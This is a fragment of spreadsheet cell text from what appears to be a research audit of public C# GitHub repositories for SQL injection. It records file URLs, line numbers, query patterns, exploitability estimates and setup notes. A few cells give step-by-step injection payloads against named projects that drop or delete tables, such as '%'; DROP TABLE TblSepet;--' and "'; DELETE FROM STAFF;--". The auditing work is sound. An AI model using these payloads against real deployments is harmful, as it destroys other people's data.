    <t>100, 101, 104, 132, 133, 138, 165, 193, 194, 198, 235, 236, 237, 252, 253, 294, 296: property(get, set) in the same class "SqlLite.cs"
195: method argument: dead code.
428, 435, 461:method argument: dead code.
web application(open "sharpmap.server" in browser)</t>
  </si>
  <si>
    <t>https://github.com/wuchao288/wexin/raw/5f932bbf01b06f12df01e2adcfede3f32e0c38e3/Hidistro.SqlDal/Store/MenuDao.cs</t>
  </si>
  <si>
    <t>like + userinput</t>
  </si>
  <si>
    <t>dead code
I was able to open hidistro.web in web browser
web application(web.config, .aspx, open in browser)</t>
  </si>
  <si>
    <t>https://github.com/zhenghua75/WeiXinEasy/raw/f21f0f0788f4792a1e30ec4e8ec190984ca13713/DBUtility/DbHelperSQLite.cs</t>
  </si>
  <si>
    <t>max ( + col) from + table</t>
  </si>
  <si>
    <t>"DBUtility" is library.
able to open "Mozart" in browser
web application (web.config)</t>
  </si>
  <si>
    <t>https://github.com/matthieu-dubois/MDU_ReaderNFC/raw/bebe93de751f06f8742e55465a06bcdb1777d32b/WindowsFormsApp1/Form1.cs</t>
  </si>
  <si>
    <t xml:space="preserve"> 152, 170, 203</t>
  </si>
  <si>
    <t>select *  into {textBoxListe.Text}?</t>
  </si>
  <si>
    <t>potential</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">"student" based on the name of project, 2. size of project
it is likely to be exploitable since table name come from </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">textbox.
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <scheme val="minor"/>
      </rPr>
      <t>windows application</t>
    </r>
  </si>
  <si>
    <t>https://github.com/ramyothman/RBM/raw/776dec4975bdb24f3e6029e161f12536dff0a218/Jareeda/DataAccessLayer/DataAccessComponents/Conference/InvitedGuestsDAC.cs</t>
  </si>
  <si>
    <t>75, 99</t>
  </si>
  <si>
    <t>web app: web.config, .aspx</t>
  </si>
  <si>
    <t>https://github.com/rlfqudxo/playscript-mono/raw/4cba1782f6b5d1bcb0b4d435cc8ae9e0a1fc887d/mcs/class/System.Data/System.Data.SqlClient/SqlCommandBuilder.cs</t>
  </si>
  <si>
    <t>321, 381, 393, 426, 452, 539</t>
  </si>
  <si>
    <t>string.Format
Delete+ table
where + condition
insert + cols
update + table</t>
  </si>
  <si>
    <t>property (set, get)
web app because I can open(playscript-mono-master/mcs/tools/xbuild/tests/standalone/Application/UpgradeLog.htm) in browser</t>
  </si>
  <si>
    <t>https://github.com/dnobori/DN-OSS-Learn/raw/55dd666bae224427e2847f29b8aa2888d68c2763/dotnet-5.0.0/SqlClient-2.1.0-preview2/src/Microsoft.Data.SqlClient/tests/ManualTests/SQL/SqlBulkCopyTest/Transaction1.cs</t>
  </si>
  <si>
    <t>21, 52</t>
  </si>
  <si>
    <t>create + table
drop + table</t>
  </si>
  <si>
    <t>method argument. no refrence to method test</t>
  </si>
  <si>
    <t>https://github.com/hippietrail/hsb0307/raw/4c80764e118f61adc18466103d0dab25a141bf8e/projects/Foosun/Foosun.SQLServerDAL/Search.cs</t>
  </si>
  <si>
    <t>25, 28, 101</t>
  </si>
  <si>
    <t>from + table</t>
  </si>
  <si>
    <t>protected string (pre)
web application(becaus I could open WebAPP1 in browser,
no refrence to method (SearchGetPage)</t>
  </si>
  <si>
    <t>https://github.com/PanzerFaustNL/playscript-mono/raw/bdd54caeb7377f946dea47746e263bb7a538b9f3/mcs/class/System.Data/System.Data.Common/DbCommandBuilder.cs</t>
  </si>
  <si>
    <t>64, 65, 331, 412, 187, 266</t>
  </si>
  <si>
    <t>where + condition
Delete + table
insert + col
update + table</t>
  </si>
  <si>
    <t>412: construct string with append
del/up/insert: property get in the same class
10%: since it is a big proj and I might miss something.
library: because I received missing .exe file error</t>
  </si>
  <si>
    <t>https://github.com/wqjzzgci/hydronumerics/raw/20051f52e1b921deca0d94670f46b54dadea4139/ThirdPartySoftware/DataConnector/DataConnectorWCF/Services/SQLService.svc.cs</t>
  </si>
  <si>
    <t>select + cols
from + table
where + condition</t>
  </si>
  <si>
    <t>dead code, hard coded</t>
  </si>
  <si>
    <t>web app: because I can open (dataconectorUI) in browser.
where condition is hardcoded. in a method never called</t>
  </si>
  <si>
    <t>https://github.com/guoyu07/XSTORE/raw/2462dbdb6a9d0acb5b21b10c639e9030ad20fd56/%E4%BA%8C%E4%BB%A3/X_STORE/tdx.database/tdx.database/database/B2C_vipcard.cs</t>
  </si>
  <si>
    <t>select + cols</t>
  </si>
  <si>
    <t>SQLIAs and SQLIDAs
userinput(col) method arg, GetList -&gt; CheckRankID/ col = "*"(another ref in Vip-Activity.aspx.cs in PageLoad(hardcoded as well)/ FranchisesEdit.cs -&gt;SenkVIP , SenkVIPDefault/ Edit-Activity.aspx.cs -&gt; btn_Save_ServerClick/ B@C-mem.cs -&gt;CheckRankID: hardcoded)
web app, I can open "tdx.weixin" in a browser/ web.config</t>
  </si>
  <si>
    <t>https://github.com/Linwenqiang-git/AttributeSql/raw/162871712fd88214d02e37ec1d646cd2bd02426e/AttributeSqlDLL.Core/Repository/AttrBaseRepository.cs</t>
  </si>
  <si>
    <t>api/libarary?(not sure)</t>
  </si>
  <si>
    <t>(133, 254, 137, 258), (147, 266, 274), 204, 213, 301, 311</t>
  </si>
  <si>
    <t>where + condition
order by + col
from + table</t>
  </si>
  <si>
    <t>100% C#/
133:DebugQuerySql whereSql not called. WhereSQL =null so never go to line 133
147: DebugQuerySql(pageSearch)-&gt; DemoController.cs.OrderQuery not called!
213:tableName = typeof(TEntity)
204, 208: deadcode.
Task (internal async in same class)
not web app: no web.config/aspx</t>
  </si>
  <si>
    <t>https://github.com/mygithub6/CMS/raw/48685b3ed7f3ed4f40d1081f0bc937a4e3b2338f/src/Orchard/Data/Migration/Interpreters/MySqlCommandInterpreter.cs</t>
  </si>
  <si>
    <t xml:space="preserve">(42, 59), 111 </t>
  </si>
  <si>
    <t>alter table {0}
modify column {1}
create index {1} on {0} ({2})</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF92D050"/>
        <rFont val="Calibri"/>
        <scheme val="minor"/>
      </rPr>
      <t>no</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> ?</t>
    </r>
  </si>
  <si>
    <t>CreateStatements -&gt; ExecuteCustomInterpreter
-&gt; ?(dead code)</t>
  </si>
  <si>
    <t>40 min</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">web application: based on readme, open "Orchard.web" in browser
CMS(Content Management System)
42, 59: alter table {0} modify column {1}, 111 : create index {1} on {0} ({2})
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">install successfully. 
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <scheme val="minor"/>
      </rPr>
      <t>CreateStatements -&gt; ExecuteCustomInterpreter</t>
    </r>
  </si>
  <si>
    <t>https://github.com/seaque/LibraryManagement/raw/90d36ddce71b7f607e71d8ac02f31021f607eddd/DAL/Book_DAL.cs</t>
  </si>
  <si>
    <t>Where + conditon
Like + %{1}</t>
  </si>
  <si>
    <t>100 C#. no web.config, no html, aspx 
DAL: Data Access Layer.
SearchBook -&gt; Books.cs.materialTxt_ListSearch_TextChanged
SearchBook -&gt; Books.cs.materialTxt_HstSearch_TextChanged -&gt; Books.Designer.cs (1207)
SearchBook -&gt; Books.cs.materialTxt_UpdSearch_TextChanged -&gt;Books.Designer.cs (685)
SearchBook -&gt; Books.cs.materialTxt_RmvSearch_TextChanged -&gt; materialTxt_RmvSearch_TextChanged 132 -&gt;
SearchBook -&gt;LendHand.cs.materialTextBox2_TextChanged -&gt; LendHand.Designer.cs (723)</t>
  </si>
  <si>
    <t>https://github.com/398786172/GIT/raw/f32453a546d819f0e5e438d58f77facfd41dbb7f/OCV0625/DBUtility/SQLServerHelp.cs</t>
  </si>
  <si>
    <t>Alter +table add +col</t>
  </si>
  <si>
    <t>100% C#
Console application, WPF. NO web.config. No Html, .css, .js.
IsFieldExist</t>
  </si>
  <si>
    <t>Professional</t>
  </si>
  <si>
    <t>C#</t>
  </si>
  <si>
    <t>Other</t>
  </si>
  <si>
    <t>ORDER BY</t>
  </si>
  <si>
    <t>Exploit</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>Date Examined</t>
  </si>
  <si>
    <t>Time Spent (minutes)</t>
  </si>
  <si>
    <t>https://github.com/numandokrul/e-Commerce-NumanStore/raw/3088e6a8f504e1348171f2f0b0120f7cd6af3545/e-Commerce-NumanStore.eCommerce/App_Code/UrunCRUD.cs</t>
  </si>
  <si>
    <t>Web app</t>
  </si>
  <si>
    <t>Like</t>
  </si>
  <si>
    <t>SQL-IA</t>
  </si>
  <si>
    <t>Download and build the web app. Set up the database with the urunler and TblSepet tables. Navigate to the following page: localhost:{port app is running on}/urunler.aspx?kat=%'; DROP TABLE TblSepet;--</t>
  </si>
  <si>
    <t>100
%</t>
  </si>
  <si>
    <t>Piggybacked query using unsanitized query string</t>
  </si>
  <si>
    <t>https://github.com/trentinodigitale/GVC/raw/b2fb0dd6863c3827aa782577742851988e932b69/Repository/rtier/Service/GVCTLOG_SEGNALAZIONICollection.generated.cs</t>
  </si>
  <si>
    <t>Did not install</t>
  </si>
  <si>
    <t>The function interpolates input from a text box, so it is likely exploitable</t>
  </si>
  <si>
    <t>75
%</t>
  </si>
  <si>
    <t>https://github.com/Sarah079/DB_all_connection_ways/raw/38edeb982befe87842f5c0e20b6995ac107c43ff/CUD272ClassTutorial/OurServices/data/PersistentDataService.cs</t>
  </si>
  <si>
    <t>Unknown</t>
  </si>
  <si>
    <t>404 error when loading repo</t>
  </si>
  <si>
    <t>Column name</t>
  </si>
  <si>
    <t>Many compiler errors, it seems the project is using deprecated functions/namespaces</t>
  </si>
  <si>
    <t>Table and column name</t>
  </si>
  <si>
    <t>IDIA  is possible if the function arguments are unsanitized</t>
  </si>
  <si>
    <t>25
%</t>
  </si>
  <si>
    <t>Exploitable if the function arguments aren't sanitized</t>
  </si>
  <si>
    <t>https://github.com/Marouen-Mahou/INSAT-GL3-.NET-DataBases-TP2/raw/43fe0d0610dbdffbdc621ba1439b6170bc284d85/ADO.NET%20Connect%C3%A9/Program.cs</t>
  </si>
  <si>
    <t>Directly concatenates input from the console, very likely exploitable</t>
  </si>
  <si>
    <t>90
%</t>
  </si>
  <si>
    <t>100% C# and TSQL</t>
  </si>
  <si>
    <t>https://github.com/jrafael05/SISTEMA-DE-VENTAS/raw/39a9557715ee8aa33fc690d13e49af4fd2815941/DATOS/MovimientoDAL.cs</t>
  </si>
  <si>
    <t>Vulnerable if the argument is unsanitized</t>
  </si>
  <si>
    <t>https://github.com/ColinLoveLucky/NetFrameworkDemo/raw/3fea018516df499696b04c062450cac7e3d71686/xianggangqapp/QK.APP.Entity/ExtendEntity/BasicEntity.cs</t>
  </si>
  <si>
    <t>Depends on the function argument</t>
  </si>
  <si>
    <t>15
%</t>
  </si>
  <si>
    <t>https://github.com/ChrisZhou0405/OneLinkWalk/raw/16b94a5d9d6b7141bfb5ec3f363afde109b49723/Backup/KINGTOP.WEB/SysAdmin/Model/ModelAjaxDeal.asmx.cs</t>
  </si>
  <si>
    <t>498 compiler errors</t>
  </si>
  <si>
    <t>https://github.com/mharisbaig/Global_Cable_Network/raw/93e88e876d2418de7d1c7844586347439889091b/frmLineMan.cs</t>
  </si>
  <si>
    <t>Vulnerable if function argument is not sanitized</t>
  </si>
  <si>
    <t>https://github.com/MmejiaLopez/Prototipo2P/raw/64d06f7e1530f4fcf96b914a677c08ce1f3c0971/Programas/Navegador/Modelo/Sentencias.cs</t>
  </si>
  <si>
    <t>https://github.com/NishiokaTakeo/spider-spiderdocs/raw/77485a3e240981b502913775768d875f2c2bb76a/WebSpiderDocs/Helpers/Customs/DaoBase.cs</t>
  </si>
  <si>
    <t>Web App</t>
  </si>
  <si>
    <t>Function arguments are interpolated into the table. One argument must be an int. The other two are attributes of an instance of a class that extends the abstract class TableBase. It seems likely that these two arguments are sanitized in some way.</t>
  </si>
  <si>
    <t>5
%</t>
  </si>
  <si>
    <t>https://github.com/ferhat0935/Csharp-ile-Proje-Yonetimi-Otomasyonu/raw/eabc18297bde960a89639a19266d44462bf79119/LisansTezi.v5/LisansTezi/%C4%B0spaketi.cs</t>
  </si>
  <si>
    <t>Appears to concatenate text from a text box, so it is likely vulnerable</t>
  </si>
  <si>
    <t>Function arguments are concatenated directly into the sql</t>
  </si>
  <si>
    <t>99.9% C#</t>
  </si>
  <si>
    <t>0
%</t>
  </si>
  <si>
    <t>ASP.NET MVC 3 projects have limited functionality in Visual Studio 2019</t>
  </si>
  <si>
    <t>Function argument is concatenated directly into the sql</t>
  </si>
  <si>
    <t>https://github.com/Tom-PIT/Connected/raw/a677368cae826fcc5936031cddc18dae4beeaae0/DataProviders/TomPIT.DataProviders.Sql/Design/Browser.cs</t>
  </si>
  <si>
    <t>Library/Framework</t>
  </si>
  <si>
    <t>Unprotected library</t>
  </si>
  <si>
    <t>Tom PIT.connected is a free and open source digital experience platform</t>
  </si>
  <si>
    <t>Time limit exceeded</t>
  </si>
  <si>
    <t>This appears to be a personal repository where the creator has experimented with "C# stuff". Note the names of the folders like "HelloWorld", "ExampleProject", and "Whatever"</t>
  </si>
  <si>
    <t>Function parameter is interpolated into the sql</t>
  </si>
  <si>
    <t>Appears to contain assets for a game made with the Unity game engine</t>
  </si>
  <si>
    <t>"This project contains several of Nohros' core .NET libraries that we use in our many .NET-based projects."</t>
  </si>
  <si>
    <t>Input from text box is concatentated directly into the sql</t>
  </si>
  <si>
    <t>Based on the name of the repo "GroupProject223", this is likely a student project. It is vulnerable to SQL-IA, but not SQL-IDIA</t>
  </si>
  <si>
    <t>Web app with server and client components</t>
  </si>
  <si>
    <t>A function argument is interpolated into the sql</t>
  </si>
  <si>
    <t>Variables are concatenated into the sql statement in place of the table and column names. These variables are generated through "builder" functions, so some amount of control/sanitization seems likely</t>
  </si>
  <si>
    <t>10
%</t>
  </si>
  <si>
    <t>99.6% c#</t>
  </si>
  <si>
    <t>The getList function concatenates its OrderBy parameter into the sql, but this parameter is hardcoded in all calls to the function</t>
  </si>
  <si>
    <t>100% C#. "Programmer mate is a desktop application to help programmer to create auto Store Procedures, Projects , Business Entity , Data Access and Web API in c#."</t>
  </si>
  <si>
    <t>This appears to be a personal repository for a student based on folder names like "FInal project" and "exercise 1". There are numerous distinct projects in the repo. The proyectoFinal project is a standalone app built with WPF. It is dead code because ponernombre and poncodigo functions are never called</t>
  </si>
  <si>
    <t>Some of the functions in this file concatenate arguments for where clauses. However, in the invocations of these functions, the arguments are usually hardcoded or come from a preexisting entry in the DB. Second order injection might be possible</t>
  </si>
  <si>
    <t>Two of the functions concatenate a string argument into the sql</t>
  </si>
  <si>
    <t>https://github.com/annytab/a-webshop/raw/e238ff6b04a66799a16baa03635c1ea570889046/Webshop/Models/Unit.cs</t>
  </si>
  <si>
    <t>Seems very unlikely because the sql statements in this file are parameterized, and the sortOrder and sortField variables are retrieved from the GetValidSortOrder and GetValidSortField functions, respectively</t>
  </si>
  <si>
    <t>https://github.com/yiershan/DonetSpider/raw/436eb3e23b871ffb09f6d6c36f722e87b3cbfdd3/src/SqliteWriter/SqliteWriter.cs</t>
  </si>
  <si>
    <t>Exploitable if function parameter is not sanitized</t>
  </si>
  <si>
    <t>100% c#</t>
  </si>
  <si>
    <t>https://github.com/AshidaFaisal/qbiztro_restaurant/raw/cf4cd7c84e2d51dbc33377e603fd71e04fac7e38/INDIAN/Code/BisCarePosEdition/MyClass.cs</t>
  </si>
  <si>
    <t>Exploitable if function parameters are not sanitized</t>
  </si>
  <si>
    <t>https://github.com/yidane/51wine/raw/06406affdbcc489b49d412c1ef7a3423007d2564/WeiXinPF.DAL/ucard/wx_ucard_ticket.cs</t>
  </si>
  <si>
    <t>https://github.com/sertugkaptan/DB/raw/4a7b40189b4e3aa9252705a0d00fddc6eb42af7e/Database/AddStudentScreen.cs</t>
  </si>
  <si>
    <t>Vulnerable if functions args are not sanitized</t>
  </si>
  <si>
    <t>100% c#. The last commit's comment is "Term Project Done"</t>
  </si>
  <si>
    <t>https://github.com/antgraf/Embedded-DB-.Net-Performance-Test/raw/63957da3de03b859f298dd3a7d15559532e3cd2f/EmbeddedDbDotNetTest/EmbeddedDbDotNetTest/SqlLiteNet/SQLite.cs</t>
  </si>
  <si>
    <t>Function parameter might not be sanitized however it is of type TableMapping (and not string), so it seems less likely to be vulnerable</t>
  </si>
  <si>
    <t>https://github.com/ramyothman/Qiyas/raw/f0f4bcaed99f275f80040f266c2f9236fe6d8e62/Source/EventoNew/DataAccessLayer/DataAccessComponents/Conference/EmailTemplateDAC.cs</t>
  </si>
  <si>
    <t>Depends if the where parameter in the GetAllEmailTemplate function is sanitized</t>
  </si>
  <si>
    <t>Many many compiler errors</t>
  </si>
  <si>
    <t>https://github.com/printf-dj/Alpha/raw/78f4305a06177b23a87f3f5082437cf0ca8bcc69/Alpha%20Rebranded/s_librarycheck.aspx.cs</t>
  </si>
  <si>
    <t>All the input fields in the regisration page are sanitized using regex, so nothing can be injected</t>
  </si>
  <si>
    <t>https://github.com/130641641/Sql-Server-Sample/raw/d34e1ab5f404bb5b660282e15ecb32033903c3dc/sample/DataAccessLayer/DataBase.cs</t>
  </si>
  <si>
    <t>Both table and column names use function arguments, so injection is possible</t>
  </si>
  <si>
    <t>No Program.cs file or other starting point for an application. Lots of files are missing their file extension. This seems like some kind of test project</t>
  </si>
  <si>
    <t>https://github.com/felwanew/AisBuchung/raw/a782dba22ab322b527ff2c59a19c640c10cd84c6/AisBuchung_Api/Models/DatabaseManager.cs</t>
  </si>
  <si>
    <t>Function argument concatenated to the query, so it depends how the function is used</t>
  </si>
  <si>
    <t>100 c#</t>
  </si>
  <si>
    <t>https://github.com/dimitarminchev/ITCareer/raw/8c643c1d4fe5431b778027c8f3fa9a50872f2778/07.%20Software%20Development/2020/7.%20Databases/MiniORM/DatabaseConnection.cs</t>
  </si>
  <si>
    <t>Tutorial</t>
  </si>
  <si>
    <t>Table names, order by</t>
  </si>
  <si>
    <t>Depends how the functions is used</t>
  </si>
  <si>
    <t>"Electronic repository with learning materials, tasks and solutions under the national program "Training for IT skills and career" of the Ministry of Education and Science (MES) for acquiring the profession of Applied programmer." (google translation of the README)</t>
  </si>
  <si>
    <t>https://github.com/sharifqasrawi/SIF-IT-Dept-app/raw/ca5378e51eca0bda8e69cf3d3138bf947a58c8a2/PL/frmPayDocs.cs</t>
  </si>
  <si>
    <t>Table name is concatentated to the SQL statement. The name of the table comes from a drop down list. These are generally safer than text boxes but injection might still be possible.</t>
  </si>
  <si>
    <t>20
%</t>
  </si>
  <si>
    <t>https://github.com/yunxiaokeji/ErDangJia/raw/0c7f968b574da46557df0ae1ebc6d75794b2564b/CloudSalesDAL/Common/CommonDAL.cs</t>
  </si>
  <si>
    <t>SQL-IDIA is possible depending on how the functions in this file are used</t>
  </si>
  <si>
    <t>50
%</t>
  </si>
  <si>
    <t>YXAPP could not be loaded</t>
  </si>
  <si>
    <t>https://github.com/williamchang/creativecrew-web-aspnet-foundation_aspnet_webforms/raw/64336ce8d50939036febe74602b604a68c960467/App_Code/DatabaseCommon.cs</t>
  </si>
  <si>
    <t>Visual studio was unable to open the project because: "The project or web cannot be found"</t>
  </si>
  <si>
    <t>https://github.com/lucaSchiavon/Re2017MVCSoftware/raw/1606608a3edd4782f9a68e41326550e5a1c9dc85/Prj.Api/ItryRepository/BaseRepository.cs</t>
  </si>
  <si>
    <t>SQL-IDIA is possible if repo.TableName is unsanitized</t>
  </si>
  <si>
    <t>"Server Error in '/' Application"</t>
  </si>
  <si>
    <t>https://github.com/KristhelBrigitte/Biblio/raw/adb95e8dcd155311af5a0470fc1fbf502b8bee01/AccesoDatos/ADEditorial.cs</t>
  </si>
  <si>
    <t>SQL-IA is possible if the function arguments are not sanitized</t>
  </si>
  <si>
    <t>5
0
%</t>
  </si>
  <si>
    <t>https://github.com/sofyanard/bankpapua-sme/raw/cd097db5eca9e85a9b43d667b02a26033f2b8973/Facilities/AssignBulkCO.aspx.cs</t>
  </si>
  <si>
    <t>User input from a label (LBL_SORT) is directly concatented into the query, so it is likely that an injection is possible</t>
  </si>
  <si>
    <t>Error in Visual Studio. Project could not be loaded</t>
  </si>
  <si>
    <t>https://github.com/cdc-dpbrown/EpiInfoVHF/raw/a0dae03300ff9bbfa4aeb85062b3f7ad8983c6b2/ContactTracing.ImportExport/XmlDataImporter.cs</t>
  </si>
  <si>
    <t>Lots of potentially vulnerable functions</t>
  </si>
  <si>
    <t>80
%</t>
  </si>
  <si>
    <t>https://github.com/faester/aomlinq/raw/0cc6a822730484e14dff1cb4cf90ab2b230b1b2f/GenDB/PerformanceTests/ExcelWriter.cs</t>
  </si>
  <si>
    <t>Vulnerable if the function parameters aren't sanitized</t>
  </si>
  <si>
    <t>100 C#</t>
  </si>
  <si>
    <t>https://github.com/attamunim/HotelManagement/raw/7c4b903f85b9d4c4e10678208a4c0bcc569442ce/HotelManagement/Login.cs</t>
  </si>
  <si>
    <t>The verifier function constructs the SQL statements. This function uses one of its arguments for the table name. However, the table name argument is hardcoded in all calls to verifier.</t>
  </si>
  <si>
    <t>https://github.com/vanjavii/HighschoolGradebook/raw/0973007ca8c4d9bd8614d6fac740811e7f455b62/Repository/DatabaseRepository/GenericDbRepository.cs</t>
  </si>
  <si>
    <t>Table and column names, order by</t>
  </si>
  <si>
    <t>There are numerous functions in this file that interpolate function arguments directly into SQL statements. If even one of these functions is not properly used even once, an injection is possible.</t>
  </si>
  <si>
    <t>95
%</t>
  </si>
  <si>
    <t>https://github.com/josueVegaR/Matricula-2021---Web/raw/1c734528119df738ea5b68d8c85ecd4427407662/AccesoDatos/ADHorarios.cs</t>
  </si>
  <si>
    <t>The ListarHorarios function in ADHorarios.cs is potentially vulnerable, but this function is only called by the ListarHorarios function in LogicaHorarios.cs. The latter function is never called. (Dead code)</t>
  </si>
  <si>
    <t>https://github.com/jvtipaymerantes/Coffee/raw/32f5e2a528f80f1a8dc837faa6b53f4fbbd7722b/coposProject/Forms/salesForm.cs</t>
  </si>
  <si>
    <t>Text from textBox1 is concatenated directly into a query. This is almost certainly vulnerable to a SQL-IA</t>
  </si>
  <si>
    <t>100% C# files. compiler errors</t>
  </si>
  <si>
    <t>https://github.com/zombekast/basi_dannih/raw/1fa53abfa4bd1b5a018320be7f58b3e3fd2700d3/%D0%9B%D0%B0%D0%B1%D0%B0%201%20%D0%B1%D0%B4/%D0%9B%D0%B0%D0%B1%D0%B0%201%20%D0%B1%D0%B4/Form1.cs</t>
  </si>
  <si>
    <t>SQL-IDIA</t>
  </si>
  <si>
    <t>Set up the DB with the exampoints table. Launch the app. Enter the following into the text box above the blue button: Maths; DROP TABLE Exampoints;#   Then click the blue button.</t>
  </si>
  <si>
    <t>100% C# files. Also vulnerable to SQL-IA</t>
  </si>
  <si>
    <t>https://github.com/wojilu/wojilu/raw/83a2f1c850ec49cee0f40cf8fa71bcd2d8e92313/wojilu/ORM/Operation/UpdateOperation.cs</t>
  </si>
  <si>
    <t>The table name is dynamically obtained from the TableName property of an "EntityInfo" object. The potentially vulnerable function ("Update") is referenced dozens of times. It is difficult to say if this is an unprotected library</t>
  </si>
  <si>
    <t>Compiler errors</t>
  </si>
  <si>
    <t>https://github.com/DESUP2/Telecommunication-Management/raw/02a06f71ea6bec0a677961faf2378bf855ea63b4/Management%20Systems/Telecommunication%20Management%20System/Staff.cs</t>
  </si>
  <si>
    <t xml:space="preserve">Set up the DB, populate the staff table with a least one row. Log in as that staff member. Go to edit. Change the staff member's username to '; DELETE FROM STAFF;-- </t>
  </si>
  <si>
    <t>https://github.com/engeyads/ESCARE/raw/aec95a8396f2a8da8e0e5ae166798937c7604222/Resiept.aspx.cs</t>
  </si>
  <si>
    <t>Text from txtPID, a text box, is directly concatenated into the query. This is very likely vulnerable to a SQL-IA.</t>
  </si>
  <si>
    <t>Compiler errors, could not get the project running</t>
  </si>
  <si>
    <t>https://github.com/TobiasTao/windows-homework/raw/487ed6805e4aa1047632f130aca3238de4322d24/WPFTest/Utils/SqliteHelper.cs</t>
  </si>
  <si>
    <t xml:space="preserve">Multiple functions use their parameters for table and column names. </t>
  </si>
  <si>
    <t>70
%</t>
  </si>
  <si>
    <t>Foreign language</t>
  </si>
  <si>
    <t>https://github.com/reagtor/TradeMatchSettlementManagment/raw/71845e4141173762bf0b15e60ffa609a7bb56d3a/GTA.VTS.ManagementCenter/ManagementCenter.DAL/CommonTable/CM_NotTradeDateDAL.cs</t>
  </si>
  <si>
    <t>Uses WCF</t>
  </si>
  <si>
    <t>https://github.com/sumitvatsal/ERPMarch2022/raw/23371a592fc28a5dd0a365e3e421193fe0a29b6a/schoolERP_BLL/sqlHelper.cs</t>
  </si>
  <si>
    <t xml:space="preserve">Several functions concatenate variables for table and column names. If even one of these function parameters is not sanitized, a SQL-IDIA is possible. </t>
  </si>
  <si>
    <t>skipping - huge project with dozens or more tables to create, and the tables are very large with many columns, not worth the time and effort</t>
  </si>
  <si>
    <t>https://github.com/minaik-com-tw/EIP/raw/71680e997393ef3dc7ff0a0c61dd888eb4d27827/Security/UserCompanyS.aspx.cs</t>
  </si>
  <si>
    <t>Select, LIKE, IN</t>
  </si>
  <si>
    <t>Possible second order injection, depending on dguser table</t>
  </si>
  <si>
    <t>skipping for now</t>
  </si>
  <si>
    <t>https://github.com/onuruulusoy/WebApplication1/raw/6276284502b92bf3ec1c86503f3415e64681b644/WebApplication1/UrunDetay.aspx.cs</t>
  </si>
  <si>
    <t>Set up the DB. When the web app is launched, navigate to the following url: http://localhost:52862/UrunDetay.aspx?urun_adi=%';DROP TABLE urunler;--</t>
  </si>
  <si>
    <t>https://github.com/renfushuai/AutoDapper/raw/520fff476ccc6fbff831a97df19127bd0eb2b8d3/XDF.Core/Helper/Db/MySqlDapperHelper.cs</t>
  </si>
  <si>
    <t>Numerous function parameters are concatented into the queries. Many different injections, including some SQL-IDIAs, are possible, depending on how the functions are used.</t>
  </si>
  <si>
    <t>Uses Docker</t>
  </si>
  <si>
    <t>https://github.com/PhanDungTri/ComputerWebShop/raw/f993aae83b35a021e9f7abc66fa89eeb0f329f6c/ComputerShopApi-master/DAL/ProductDAL.cs</t>
  </si>
  <si>
    <t>Select, insert, update, delete, LIKE</t>
  </si>
  <si>
    <t>In the GetAll function, if the search parameter is not sanitized, injection is possible.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
      </rPr>
      <t xml:space="preserve">Time limit exceeded. </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>Web app could not be launched due to numerous compiler errors.</t>
    </r>
  </si>
  <si>
    <t>https://github.com/Pawel-dtas/Wealthy-RPT/raw/2673c7c49506a1f07923bc162cd4a061f21cb703/Wealthy%20RPT/PeriodImport.xaml.cs</t>
  </si>
  <si>
    <t>The SQL statement concatenates a function paramater as the name of a table, but this parameter is hardcoded in all the calls to the function</t>
  </si>
  <si>
    <t xml:space="preserve">
1
%</t>
  </si>
  <si>
    <t>100% C#. Configuration file  lclRPT.ini is missing</t>
  </si>
  <si>
    <t>https://github.com/roryArchive/CaptivePortal.POC/raw/022eb4536b924e1b2c6d6b90979597d41abb3fa8/CaptivePortal.DataAccessModule/RegisterDB.cs</t>
  </si>
  <si>
    <t>Insert</t>
  </si>
  <si>
    <t>Start up the app. Go to register. Enter a valid username and email. Enter the following for the password: a'); DROP TABLE userinfo;--</t>
  </si>
  <si>
    <t>https://github.com/Kesco-m/Kesco.Lib.Entities/raw/8d896fba88be433e31554ec6183b72349ad128da/Corporate/Net/Net.cs</t>
  </si>
  <si>
    <t>Insert, update</t>
  </si>
  <si>
    <t>All SQL statements are parameterized</t>
  </si>
  <si>
    <t>1
%</t>
  </si>
  <si>
    <t>Protected library</t>
  </si>
  <si>
    <t>https://github.com/DirectumCompany/IsblCheck/raw/049e3246e437af4c6f55add0d1d8decba6abe30d/src/IsblCheck.Context.Development/Database/Handlers/ScriptDatabaseHandler.cs</t>
  </si>
  <si>
    <t>Select, Order by</t>
  </si>
  <si>
    <t>Build errors, could not get the project running</t>
  </si>
  <si>
    <t>https://github.com/qq5013/HNXC/raw/7bcfad95eae1bb87e60c62a54652f1943d84caef/WMS/THOK.Wms.Upload/Dao/UploadDao.cs</t>
  </si>
  <si>
    <t>Select, insert, update</t>
  </si>
  <si>
    <t>Many of the queries use preexisting data from the DB. Second order injection may be possible.</t>
  </si>
  <si>
    <t>Foreign Language</t>
  </si>
  <si>
    <t>https://github.com/omerfekrem/MOAgrossStok/raw/40b148bba63a22017798523d8b1b99032e2c2213/MOAgrossStok/ciroRaporlama.cs</t>
  </si>
  <si>
    <t>Select, join, group by, update, delete, convert, LIKE</t>
  </si>
  <si>
